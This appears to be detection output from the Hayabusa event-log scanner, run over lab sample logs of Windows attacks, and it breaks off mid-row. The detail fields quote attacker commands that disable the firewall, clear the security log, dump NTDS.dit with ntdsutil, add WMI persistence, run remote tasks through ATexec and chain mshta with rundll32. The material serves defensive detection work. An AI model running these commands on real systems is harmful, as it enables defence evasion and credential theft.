Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-03 18:34:12.672 +00:00,fs01.offsec.lan,4104,high,Evas,Windows Firewall Profile Disabled,,rules/sigma/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-03 18:34:12.887 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-NetFirewallProfile): ""Set-NetFirewallProfile"" ParameterBinding(Set-NetFirewallProfile): name=""Name""; value=""Domain, Public, Private"" ParameterBinding(Set-NetFirewallProfile): name=""Enabled""; value=""False"" ParameterBinding(Set-NetFirewallProfile): name=""All""; value=""False"" ParameterBinding(Set-NetFirewallProfile): name=""PolicyStore""; value="""" ParameterBinding(Set-NetFirewallProfile): name=""GPOSession""; value="""" ParameterBinding(Set-NetFirewallProfile): name=""LogFileName""; value="""" ParameterBinding(Set-NetFirewallProfile): name=""LogMaxSizeKilobytes""; value=""0"" ParameterBinding(Set-NetFirewallProfile): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-NetFirewallProfile): name=""AsJob""; value=""False"" ParameterBinding(Set-NetFirewallProfile): name=""PassThru""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-03 18:34:12.888 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-03 18:34:12.889 +00:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-03 18:34:12.895 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-03 19:17:44.873 +00:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-03 19:17:46.489 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh a s p state off | Path: C:\Windows\System32\netsh.exe | PID: 0xfa8 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-03 19:17:46.577 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh advfirewall set privateprofile state off | Path: C:\Windows\System32\netsh.exe | PID: 0x10fc | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-03 19:17:46.577 +00:00,fs01.offsec.lan,4688,medium,Evas,Firewall Disabled via Netsh,,rules/sigma/process_creation_builtin/proc_creation_win_susp_firewall_disable.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-03 19:17:46.666 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh f s o d | Path: C:\Windows\System32\netsh.exe | PID: 0x1598 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-03 19:17:47.699 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh firewall set opmode disable | Path: C:\Windows\System32\netsh.exe | PID: 0x1504 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-03 19:39:52.893 +00:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-03 19:39:52.895 +00:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-03 19:39:53.056 +00:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 08:41:47.982 +00:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx +2021-06-04 08:41:48.041 +00:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx +2021-06-04 09:30:48.170 +00:00,exchange01.offsec.lan,11,info,,File Created,Path: E:\Exchange2016\TransportRoles\Shared\agents.config | Process: C:\Program Files (x86)\Notepad++\notepad++.exe | PID: 19108 | PGUID: 6D3C60FE-F13D-60B9-22E2-010000001D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID11-Exchange transport config modified.evtx +2021-06-05 19:35:16.721 +00:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\hacker' q q | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x724 | User: admmig | LID: 0xa8a1627a,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx +2021-06-05 19:35:16.721 +00:00,rootdc1.offsec.lan,4688,medium,CredAccess,Invocation of Active Directory Diagnostic Tool (ntdsutil.exe),,rules/sigma/process_creation_builtin/proc_creation_win_susp_ntdsutil.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx +2021-06-05 19:35:16.721 +00:00,rootdc1.offsec.lan,4688,high,CredAccess,Suspicious Process Patterns NTDS.DIT Exfil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_ntds.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx +2021-06-05 19:36:32.683 +00:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ntdsutil ""activate instance ntds"" ifm ""create full c:\hacker"" quit quit | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x1bec | User: admmig | LID: 0xa8a1627a",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx +2021-06-05 19:36:32.683 +00:00,rootdc1.offsec.lan,4688,medium,CredAccess,Invocation of Active Directory Diagnostic Tool (ntdsutil.exe),,rules/sigma/process_creation_builtin/proc_creation_win_susp_ntdsutil.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx +2021-06-05 20:17:05.433 +00:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: diskshadow.exe /s shadow.txt | Path: C:\Windows\System32\diskshadow.exe | PID: 0xda8 | User: admmig | LID: 0xa8a1627a,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Diskshadow abuse.evtx +2021-06-05 20:17:05.433 +00:00,rootdc1.offsec.lan,4688,high,Exec,Execution via Diskshadow.exe,,rules/sigma/process_creation_builtin/proc_creation_win_susp_diskshadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Diskshadow abuse.evtx +2021-06-09 19:29:58.239 +00:00,fs01.offsec.lan,20,medium,,WMI Event Consumer Activity,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Type: Command Line | Name: ""Evil"" | Dst: ""cmd.exe /c echo %ProcessId% >> c:\\\\temp\\\\log.txt"" | User: OFFSEC\admmig",rules/hayabusa/sysmon/alerts/20_WmiEventConsumerActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-09 19:29:58.240 +00:00,fs01.offsec.lan,19,medium,,WMI Event Filter Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-09 19:29:58.392 +00:00,fs01.offsec.lan,19,medium,,WMI Event Filter Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-10 14:12:46.042 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx +2021-06-10 14:12:46.058 +00:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,"c:\\temp\\log.txt"" -Trigger ProcessStart -ProcessName notepad.exe",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx +2021-06-10 14:12:46.157 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-WmiInstance): ""Set-WmiInstance"" ParameterBinding(Set-WmiInstance): name=""Namespace""; value=""root/subscription"" ParameterBinding(Set-WmiInstance): name=""Class""; value=""CommandLineEventConsumer"" ParameterBinding(Set-WmiInstance): name=""Arguments""; value=""System.Collections.Hashtable""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx +2021-06-10 14:12:46.177 +00:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-WmiInstance): ""Set-WmiInstance"" ParameterBinding(Set-WmiInstance): name=""Namespace""; value=""root/subscription"" ParameterBinding(Set-WmiInstance): name=""Class""; value=""__EventFilter"" ParameterBinding(Set-WmiInstance): name=""Arguments""; value=""System.Collections.Hashtable""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx +2021-06-10 21:21:20.636 +00:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4175e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.357 +00:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.357 +00:00,fs01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.383 +00:00,fs01.offsec.lan,4698,info,,Task Created,"Name: \bouWFQYO | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C whoami > %windir%\Temp\bouWFQYO.tmp 2>&1 \bouWFQYO | User: admmig | LID: 0x5a419bc",rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx +2021-06-10 21:21:26.383 +00:00,fs01.offsec.lan,4698,info,,Task Created,"Name: \bouWFQYO | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C whoami > %windir%\Temp\bouWFQYO.tmp 2>&1 \bouWFQYO | User: admmig | LID: 0x5a419bc",rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.390 +00:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /C whoami > C:\Windows\Temp\bouWFQYO.tmp 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x3d0 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.390 +00:00,fs01.offsec.lan,4688,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation_builtin/proc_creation_win_redirect_to_stream.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.390 +00:00,fs01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.395 +00:00,fs01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.406 +00:00,fs01.offsec.lan,4699,info,,Task Deleted,Name: \bouWFQYO | User: admmig | LID: 0x5a419bc,rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx +2021-06-10 21:21:26.406 +00:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx +2021-06-10 21:21:26.406 +00:00,fs01.offsec.lan,4699,info,,Task Deleted,Name: \bouWFQYO | User: admmig | LID: 0x5a419bc,rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.406 +00:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.415 +00:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-10 21:21:26.415 +00:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.424 +00:00,fs01.offsec.lan,4688,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_builtin/proc_creation_win_local_system_owner_account_discovery.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:26.424 +00:00,fs01.offsec.lan,4688,medium,Disc,Whoami Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_whoami.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:29.427 +00:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-10 21:21:29.427 +00:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-10 21:21:29.441 +00:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-10 21:21:29.441 +00:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-13 06:17:18.044 +00:00,sv-dc.hinokabegakure-no-sato.local,3,low,Evas | Persis,Suspicious Task Added by Bitsadmin,,rules/sigma/builtin/bits_client/win_bits_client_susp_use_bitsadmin.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx +2021-06-13 06:17:18.087 +00:00,sv-dc.hinokabegakure-no-sato.local,59,info,Evas | Persis,Bits Job Created,Job Title: test | URL: http://192.168.10.254:80/calc.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx +2021-08-07 23:32:57.348 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"" /n ""C:\Users\IEUser\Desktop\stats.doc"" | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 3424 | PGUID: 747F3D96-1829-610F-0000-0010A33FD200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:01.103 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | Process: C:\Windows\SysWOW64\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 9932 | PGUID: 747F3D96-182D-610F-0000-00106F40D300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:01.103 +00:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:01.103 +00:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:01.176 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 11196 | PGUID: 747F3D96-182D-610F-0000-00100344D300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:01.176 +00:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:01.176 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:08.346 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" c:\users\public\memViewData.jpg,PluginInit | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | LID: 0x7a857 | PID: 6576 | PGUID: 747F3D96-1834-610F-0000-00105FE5D300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:08.346 +00:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_sysmon/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-07 23:33:15.303 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x7a857 | PID: 11324 | PGUID: 